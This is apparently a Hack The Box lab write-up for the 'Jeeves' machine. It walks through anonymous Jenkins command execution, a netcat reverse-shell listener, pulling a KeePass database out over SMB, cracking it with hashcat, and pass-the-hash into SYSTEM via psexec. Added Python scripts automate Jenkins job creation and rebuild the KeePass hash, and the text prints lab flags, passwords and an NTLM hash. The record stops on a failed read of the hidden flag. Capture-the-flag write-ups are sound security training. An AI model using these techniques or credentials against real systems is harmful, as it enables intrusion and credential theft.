Jeeves-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: deep directory enumeration, getting a shell through Jenkins, cracking a .kdbx file, reading a .kdbx database with KeePassXC, password enumeration, NTFS alternate data streams (file streams)

Reference: https://www.jgeek.cn/article/110.html

0x01 Getting user

1. Target IP address: 10.10.10.63

2. Open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=2000 10.10.10.63 -oG allports -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 07:01 CST
Nmap scan report for 10.10.10.63
Host is up (0.37s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
50000/tcp open ibm-db2

Nmap done: 1 IP address (1 host up) scanned in 100.73 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,135,445,50000 -sC -sV --min-rate=2000 10.10.10.63
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 07:07 CST
Nmap scan report for 10.10.10.63
Host is up (0.24s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp filtered msrpc
445/tcp filtered microsoft-ds
50000/tcp filtered ibm-db2
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.08 seconds

3. A quick look at the default page on port 80

http://10.10.10.63/

http://10.10.10.63/error.html?

4. That does not look like an entry point either, so look at the other port, 50000 (the -sC -sV scan reported it as filtered on that run, but it answers)

http://10.10.10.63:50000

5. Run a directory scan and see what turns up

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://10.10.10.63:50000/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://10.10.10.63:50000/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

askjeeves [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 121ms]
[WARN] Caught keyboard interrupt (Ctrl-C)

6. Browse to that directory

http://10.10.10.63:50000/askjeeves/

7. It is accessible anonymously, so try running a command

Started by user anonymous
Building in workspace C:\Users\Administrator\.jenkins\workspace\test1
[test1] $ cmd /c call C:\Users\kohsuke\AppData\Local\Temp\jenkins7419465613522893143.bat

C:\Users\Administrator\.jenkins\workspace\test1>whoami
jeeves\kohsuke

C:\Users\Administrator\.jenkins\workspace\test1>exit 0
Finished: SUCCESS

8. This is about the fourth Jenkins box I have run into, so I already have a feel for it: I first ran an arbitrary command to confirm that execution works, then checked with ping whether the target can reach my machine.

Started by user anonymous
Building in workspace C:\Users\Administrator\.jenkins\workspace\test1
[test1] $ cmd /c call C:\Users\kohsuke\AppData\Local\Temp\jenkins4410486682208148338.bat

C:\Users\Administrator\.jenkins\workspace\test1>ping 10.10.14.39

Pinging 10.10.14.39 with 32 bytes of data:
Reply from 10.10.14.39: bytes=32 time=135ms TTL=63
Reply from 10.10.14.39: bytes=32 time=239ms TTL=63
Reply from 10.10.14.39: bytes=32 time=136ms TTL=63
Reply from 10.10.14.39: bytes=32 time=246ms TTL=63

Ping statistics for 10.10.14.39:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 135ms, Maximum = 246ms, Average = 189ms

C:\Users\Administrator\.jenkins\workspace\test1>exit 0
Finished: SUCCESS

9. The target can reach me, so next try to get a reverse shell.

https://sh1yan.top/rt-cmd/

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.10.63] 49676

PS C:\Users\Administrator\.jenkins\workspace\test1>
PS C:\Users\Administrator\.jenkins\workspace\test1> whoami
jeeves\kohsuke
PS C:\Users\Administrator\.jenkins\workspace\test1>

10. That works; now read the flag

PS C:\Users\Administrator\.jenkins\workspace\test1> ls C:/Users


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2017 11:07 PM Administrator
d----- 11/5/2017 9:17 PM DefaultAppPool
d----- 11/3/2017 11:19 PM kohsuke
d-r--- 10/25/2017 4:46 PM Public


PS C:\Users\Administrator\.jenkins\workspace\test1> cd C:/Users/kohsuke/Desktop
PS C:\Users\kohsuke\Desktop> ls


Directory: C:\Users\kohsuke\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/3/2017 11:22 PM 32 user.txt


PS C:\Users\kohsuke\Desktop> cat user.txt
e3232272596fb47950d59c4cf1e7066a
PS C:\Users\kohsuke\Desktop>

11. Screenshots of how the shell above was obtained:

Figure 8: Jenkins home → New Item → enter an item name → choose Freestyle project

Figure 9: In the Build section, add the build step Execute Windows batch command and paste a base64-encoded PowerShell reverse shell. Anonymous users on this instance can create and build jobs, which is the same as anonymous command execution as the Jenkins service account.
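The same steps (New Item → Freestyle project → Execute Windows batch command → Build Now) can be driven over the Jenkins REST API instead of the UI. This is example code added to the writeup, not the author's tooling; the Jenkins base URL, the job name `test1` and the placeholder script in `__main__` are assumptions for illustration, and the `-EncodedCommand` helper shows the UTF-16LE detail that trips people up when hand-encoding the payload.

```python
"""Create a freestyle Jenkins job with a Windows batch build step, queue a
build and read the console, over the REST API, anonymously.

Example code added to this writeup; it is not the author's tooling. Base URL,
job name and script in __main__ are assumptions.
"""
import base64
import json
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
from xml.sax.saxutils import escape


def encode_powershell(script: str) -> str:
    """powershell -EncodedCommand wants base64 of the script as UTF-16LE, not
    UTF-8; a UTF-8 encoding runs as garbage and fails silently in the build."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def batch_command_for(script: str) -> str:
    """The one line that goes into the 'Execute Windows batch command' box."""
    return ("powershell -NoProfile -NonInteractive -EncodedCommand "
            + encode_powershell(script))


def job_config_xml(command: str) -> str:
    """Minimal freestyle-project config.xml with one hudson.tasks.BatchFile
    builder, i.e. what the New Item wizard stores for that build step."""
    return (
        "<?xml version='1.1' encoding='UTF-8'?>\n"
        "<project>\n"
        "  <keepDependencies>false</keepDependencies>\n"
        "  <properties/>\n"
        '  <scm class="hudson.scm.NullSCM"/>\n'
        "  <canRoam>true</canRoam>\n"
        "  <disabled>false</disabled>\n"
        "  <triggers/>\n"
        "  <concurrentBuild>false</concurrentBuild>\n"
        "  <builders>\n"
        "    <hudson.tasks.BatchFile>\n"
        f"      <command>{escape(command)}</command>\n"   # & and < must be escaped
        "    </hudson.tasks.BatchFile>\n"
        "  </builders>\n"
        "  <publishers/>\n"
        "  <buildWrappers/>\n"
        "</project>\n"
    )


class JenkinsClient:
    """Unauthenticated client: enough to create a job, build it, read the log."""

    def __init__(self, base_url: str):
        self.base_url = base_url.rstrip("/")
        # Keep the session cookie: newer Jenkins ties the CSRF crumb to it.
        self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
        self.headers = {}
        try:
            with self.opener.open(self.base_url + "/crumbIssuer/api/json", timeout=10) as r:
                crumb = json.load(r)
            self.headers[crumb["crumbRequestField"]] = crumb["crumb"]
        except urllib.error.HTTPError:
            pass  # 404 here means CSRF protection is switched off

    def _post(self, path, body=b"", content_type=None):
        headers = dict(self.headers)
        if content_type:
            headers["Content-Type"] = content_type
        req = urllib.request.Request(self.base_url + path, data=body,
                                     headers=headers, method="POST")
        with self.opener.open(req, timeout=10) as r:
            return r.status

    def create_job(self, name, command):
        query = urllib.parse.urlencode({"name": name})
        return self._post("/createItem?" + query,
                          job_config_xml(command).encode(), "application/xml")

    def build(self, name):
        return self._post("/job/" + urllib.parse.quote(name) + "/build")

    def console(self, name):
        url = self.base_url + "/job/" + urllib.parse.quote(name) + "/lastBuild/consoleText"
        with self.opener.open(url, timeout=10) as r:
            return r.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Assumed values: the Jenkins path from this box and a harmless test script.
    jenkins = JenkinsClient("http://10.10.10.63:50000/askjeeves")
    script = "whoami; hostname"   # swap in a reverse shell once this round-trips
    jenkins.create_job("test1", batch_command_for(script))
    jenkins.build("test1")
    time.sleep(10)                # give the executor time to pick the build up
    sys.stdout.write(jenkins.console("test1"))
```

Whichever way the job is created, it leaves the artifacts seen above: a build log starting with "Started by user anonymous" and a jenkins<random>.bat dropped in the service account's Temp directory, which is what a defender should be alerting on.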

0x02 Getting SYSTEM

12. Start internal enumeration

PS C:\Users\Administrator\.jenkins> ls


Directory: C:\Users\Administrator\.jenkins


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/27/2024 6:27 AM jobs
d----- 11/3/2017 10:33 PM logs
d----- 11/3/2017 10:33 PM nodes
d----- 11/3/2017 10:44 PM plugins
d----- 12/24/2017 2:47 AM secrets
d----- 11/8/2017 8:52 AM updates
d----- 11/3/2017 10:33 PM userContent
d----- 11/3/2017 10:33 PM users
d----- 11/3/2017 10:47 PM war
d----- 11/3/2017 10:43 PM workflow-libs
d----- 4/27/2024 6:28 AM workspace
-a---- 11/8/2017 4:45 PM 48 .owner
-a---- 4/27/2024 6:25 AM 1684 config.xml
-a---- 4/27/2024 6:25 AM 156 hudson.model.UpdateCenter.xml
-a---- 11/3/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml
-a---- 11/3/2017 10:33 PM 1712 identity.key.enc
-a---- 11/3/2017 10:46 PM 94 jenkins.CLI.xml
4/27/2024 6:25 AM 77315 jenkins.err.log
-a---- 11/3/2017 10:47 PM 360448 jenkins.exe
-a---- 11/3/2017 10:47 PM 331 jenkins.exe.config
-a---- 4/27/2024 6:25 AM 4 jenkins.install.InstallUtil.lastExecVersion
-a---- 11/3/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state
-a---- 11/3/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml
10/25/2022 12:41 PM 2856 jenkins.out.log
-a---- 4/27/2024 6:25 AM 4 jenkins.pid
-a---- 11/3/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml
-a---- 11/3/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml
-a---- 11/3/2017 10:47 PM 74271222 jenkins.war
-a---- 4/27/2024 6:25 AM 36360 jenkins.wrapper.log
-a---- 11/3/2017 10:49 PM 2881 jenkins.xml
-a---- 4/27/2024 6:25 AM 907 nodeMonitors.xml
-a---- 11/3/2017 10:47 PM 129 queue.xml.bak
-a---- 11/3/2017 10:33 PM 64 secret.key
-a---- 11/3/2017 10:33 PM 0 secret.key.not-so-secret


PS C:\Users\Administrator\.jenkins> systeminfo

Host Name: JEEVES
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.10586 N/A Build 10586
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00331-20304-47406-AA297
Original Install Date: 10/25/2017, 4:45:33 PM
System Boot Time: 4/27/2024, 6:24:52 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,164 MB
Virtual Memory: Max Size: 2,687 MB
Virtual Memory: Available: 1,684 MB
Virtual Memory: In Use: 1,003 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 10 Hotfix(s) Installed.
[01]: KB3150513
[02]: KB3161102
[03]: KB3172729
[04]: KB3173428
[05]: KB4021702
[06]: KB4022633
[07]: KB4033631
[08]: KB4035632
[09]: KB4051613
[10]: KB4041689
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.63
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\Users\Administrator\.jenkins>

# Upload the enumeration tool and start enumerating

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.63 - - [27/Apr/2024 21:51:18] "GET /winPEASx64.exe HTTP/1.1" 200 -

PS C:\Users\kohsuke\Desktop> ./enum.exe

? Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
Current user: kohsuke
Current groups: Domain Users, Everyone, Users, Service, Console Logon, Authenticated Users, This Organization, Local account, Local, NTLM Authentication
=================================================================================================

JEEVES\Administrator: Built-in account for administering the computer/domain
|->Groups: Administrators
|->Password: CanChange-NotExpi-Req

JEEVES\DefaultAccount(Disabled): A user account managed by the system.
|->Groups: System Managed Accounts Group
|->Password: CanChange-NotExpi-NotReq

JEEVES\Guest(Disabled): Built-in account for guest access to the computer/domain
|->Groups: Guests
|->Password: NotChange-NotExpi-NotReq

JEEVES\kohsuke
|->Groups: Users
|->Password: CanChange-Expi-Req

? Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
cmd(3692)[C:\Windows\SysWOW64\cmd.exe] -- POwn: kohsuke
Command Line: cmd /c call C:\Users\kohsuke\AppData\Local\Temp\jenkins1222239407732559434.bat


jenkins(2708)[C:\Users\Administrator\.jenkins\jenkins.exe] -- POwn: kohsuke -- isDotNet
Permissions: kohsuke [AllAccess]
Possible DLL Hijacking folder: C:\Users\Administrator\.jenkins (kohsuke [AllAccess])
Command Line: "C:\Users\Administrator\.jenkins\jenkins.exe"


Version: NetNTLMv2
Hash: kohsuke::JEEVES:1122334455667788:7a827f38b54fae3f3151676f68a0c93c:0101000000000000d46708d19098da01fbbbed404b08d8f100000000080030003000000000000000000000000030000045099ebf9df87c975e02f798e39b62ef397a0a1229ebd19ee646cc9a7539dc8d0a00100000000000000000000000000000000000090000000000000000000000

PS C:\Users\Administrator\.jenkins> cd C:/Users/kohsuke
PS C:\Users\kohsuke>
PS C:\Users\kohsuke> tree /F /A
Folder PATH listing
Volume serial number is 00000200 71A1:6FA1
C:.
+---.groovy
| \---grapes
+---Contacts
+---Desktop
| enum.exe
| user.txt
|
+---Documents
| CEH.kdbx
|
+---Downloads
+---Favorites
| | Bing.url
| |
| \---Links
+---Links
| Desktop.lnk
| Downloads.lnk
| OneDrive.lnk
|
+---Music
+---OneDrive
+---Pictures
| +---Camera Roll
| \---Saved Pictures
+---Saved Games
+---Searches
| winrt--{S-1-5-21-2851396806-8246019-2289784878-1001}-.searchconnector-ms
|
\---Videos
PS C:\Users\kohsuke>


PS C:\Users\kohsuke\Documents> ls


Directory: C:\Users\kohsuke\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2017 1:43 PM 2846 CEH.kdbx


PS C:\Users\kohsuke\Documents> net use \\10.10.14.39\share /u:test test
The command completed successfully.

PS C:\Users\kohsuke\Documents> dir \\10.10.14.39\share


Directory: \\10.10.14.39\share


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/29/2024 4:50 AM .svn
d----- 4/21/2024 6:09 PM htb-vpn
d----- 4/24/2024 5:12 PM tools
d----- 4/26/2024 7:26 PM reports
d----- 4/26/2024 7:20 PM results
-a---- 4/26/2024 7:05 PM 381 allports


PS C:\Users\kohsuke\Documents> copy CEH.kdbx \\10.10.14.3\share\CEH.kdbx
PS C:\Users\kohsuke\Documents> copy CEH.kdbx \\10.10.14.39\share\CEH.kdbx
PS C:\Users\kohsuke\Documents>

13. Enumeration turned up a .kdbx database, which was copied back to the attacking host over the SMB share; now try to crack it

┌──(kali㉿offsec)-[~/Desktop]
└─$ file CEH.kdbx
CEH.kdbx: Keepass password database 2.x KDBX

┌──(kali㉿offsec)-[~/Desktop]
└─$ keepass2john CEH.kdbx
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

┌──(kali㉿offsec)-[~/Desktop]
└─$ touch keepass

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo 'CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48' > keepass

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat keepass
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "keepass"
13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) | Password Manager
29700 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) - keyfile only mode | Password Manager

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 13400 ./keepass /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea...47db48
Time.Started.....: Sun Apr 28 00:22:49 2024 (9 secs)
Time.Estimated...: Sun Apr 28 00:22:58 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 6469 H/s (7.32ms) @ Accel:256 Loops:256 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 55296/14344385 (0.39%)
Rejected.........: 0/55296 (0.00%)
Restore.Point....: 54272/14344385 (0.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:5888-6000
Candidate.Engine.: Device Generator
Candidates.#1....: 250895 -> grad2010
Hardware.Mon.#1..: Util: 98%

Cracking performance lower than expected?

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Sun Apr 28 00:22:41 2024
Stopped: Sun Apr 28 00:22:59 2024
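What keepass2john actually extracts is worth seeing, because it explains why a CPU cracked this in nine seconds: the KDBX 3.x header is stored in the clear, and the `$keepass$` line is just its seeds, IV and expected start bytes plus the first 32 bytes of ciphertext, with the 6000-round AES key transform as the only cost. The parser below is example code added to the writeup, not keepass2john itself; it handles only the KDBX 3.x header layout with the AES cipher (algorithm id 0 in the hash). `build_sample()` is a constructed file carrying the values from the CEH.kdbx hash above, so the output reproduces that line; the bytes after its header are not the real database.

```python
"""Rebuild the $keepass$ line that keepass2john emits from the plaintext KDBX
3.x header, to show what hashcat mode 13400 is really attacking.

Example code added to this writeup; it is not keepass2john. Only the KDBX 3.x
header with the AES cipher is handled. build_sample() is constructed from the
seed, IV and start-bytes values in the CEH.kdbx hash.
"""
import struct

KDBX_SIG1, KDBX_SIG2 = 0x9AA2D903, 0xB54BFB67
AES_CIPHER_UUID = bytes.fromhex("31c1f2e6bf714350be5805216afc5aff")

# KDBX 3.x header field ids
END_OF_HEADER, CIPHER_ID, COMPRESSION_FLAGS = 0, 2, 3
MASTER_SEED, TRANSFORM_SEED, TRANSFORM_ROUNDS = 4, 5, 6
ENCRYPTION_IV, STREAM_START_BYTES = 7, 9


def parse_kdbx3_header(blob: bytes) -> dict:
    """Parse the TLV header: 1-byte id, 2-byte LE length, payload; id 0 ends it.
    Returns fields by id plus 'header_end', the offset where ciphertext starts."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", blob, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KDBX file")
    if major != 3:
        raise ValueError(f"KDBX {major}.{minor}: only the 3.x header layout is handled")
    fields, off = {}, 12
    while True:
        fid, size = struct.unpack_from("<BH", blob, off)
        off += 3
        data = blob[off:off + size]
        off += size
        if fid == END_OF_HEADER:
            break
        fields[fid] = data
    fields["header_end"] = off
    return fields


def transform_rounds(fields: dict) -> int:
    """AES-KDF iteration count, a uint64; this is the only work factor."""
    return struct.unpack("<Q", fields[TRANSFORM_ROUNDS])[0]


def keepass2john_line(name: str, blob: bytes) -> str:
    """$keepass$*2*<rounds>*<alg>*<master seed>*<transform seed>*<IV>*
    <expected start bytes>*<first 32 ciphertext bytes>. A cracker derives a key
    from each candidate with <rounds> AES-ECB iterations over the transform
    seed, decrypts the first block in CBC mode and checks it against the
    expected start bytes; no other part of the file is needed."""
    f = parse_kdbx3_header(blob)
    if f[CIPHER_ID] != AES_CIPHER_UUID:
        raise ValueError("non-AES cipher: algorithm id mapping not covered here")
    start = f["header_end"]
    first_block = blob[start:start + 32]
    if len(first_block) != 32:
        raise ValueError("file truncated right after the header")
    parts = ["$keepass$", "2", str(transform_rounds(f)), "0",
             f[MASTER_SEED].hex(), f[TRANSFORM_SEED].hex(), f[ENCRYPTION_IV].hex(),
             f[STREAM_START_BYTES].hex(), first_block.hex()]
    return name + ":" + "*".join(parts)


def build_sample() -> bytes:
    """Constructed KDBX 3.1 header using the values from the CEH.kdbx hash;
    the trailing 32 bytes stand in for the first encrypted block."""
    def tlv(fid, data):
        return struct.pack("<BH", fid, len(data)) + data
    hdr = struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 1, 3)   # version 3.1
    hdr += tlv(CIPHER_ID, AES_CIPHER_UUID)
    hdr += tlv(COMPRESSION_FLAGS, struct.pack("<I", 1))      # gzip
    hdr += tlv(MASTER_SEED, bytes.fromhex(
        "1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d"))
    hdr += tlv(TRANSFORM_SEED, bytes.fromhex(
        "3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091"))
    hdr += tlv(TRANSFORM_ROUNDS, struct.pack("<Q", 6000))
    hdr += tlv(ENCRYPTION_IV, bytes.fromhex("393c97beafd8a820db9142a6a94f03f6"))
    hdr += tlv(STREAM_START_BYTES, bytes.fromhex(
        "b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff"))
    hdr += tlv(END_OF_HEADER, b"\r\n\r\n")
    return hdr + bytes.fromhex(
        "cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48")


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(keepass2john_line("CEH", blob))
```

Run it against a real .kdbx and compare with keepass2john; the point is that 6000 rounds of AES is a trivial work factor for a wordlist attack, which is why hashcat found moonshine1 in under 1% of rockyou. KDBX 4 databases with Argon2 raise that cost by orders of magnitude.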

14. With the master password cracked, open the database in KeePassXC and look through it

15. After trying each stored entry in turn, the hash on the last line turned out to be the usable one: the NT half works as a pass-the-hash credential for administrator

moonshine1

administrator

S1TjAtJHKsugh9oC4VZl

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.63 -u 'administrator' -H 'e0fb1fb85756c24235ff238cbe81fe00'
SMB 10.10.10.63 445 JEEVES [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB 10.10.10.63 445 JEEVES [+] Jeeves\administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)

16. Log in and grab the flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec administrator@10.10.10.63 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file STnNhPDV.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service LIeY on 10.10.10.63.....
[*] Starting service LIeY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whomai
'whomai' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cat C:/Users/Administrator/Desktop/root.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>

17. cat is not a cmd.exe command, and type rejects forward-slash paths, so switch to native cmd syntax and keep looking

C:\Windows\system32> 
C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.

C:\Windows\system32> cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop> ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1

Directory of C:\Users\Administrator\Desktop

11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 2,582,810,624 bytes free

C:\Users\Administrator\Desktop> type hm.txt
The flag is elsewhere. Look deeper.
C:\Users\Administrator\Desktop> dir /Ah
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1

Directory of C:\Users\Administrator\Desktop

11/03/2017 10:03 PM 282 desktop.ini
1 File(s) 282 bytes
0 Dir(s) 2,582,810,624 bytes free

C:\Users\Administrator\Desktop> dir /AD
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1

Directory of C:\Users\Administrator\Desktop

11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 2,582,810,624 bytes free

C:\Users\Administrator\Desktop> type desktop.ini

[.ShellClassInfo]
LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21769
IconResource=%SystemRoot%\system32\imageres.dll,-183

C:\Users\Administrator\Desktop> dir /R
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1

Directory of C:\Users\Administrator\Desktop

11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
34 hm.txt:root.txt:$DATA
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 2,582,810,624 bytes free

C:\Users\Administrator\Desktop>

18. There is the trick; now read the flag

C:\Users\Administrator\Desktop> type hm.txt:root.txt:$DATA
The filename, directory name, or volume label syntax is incorrect.

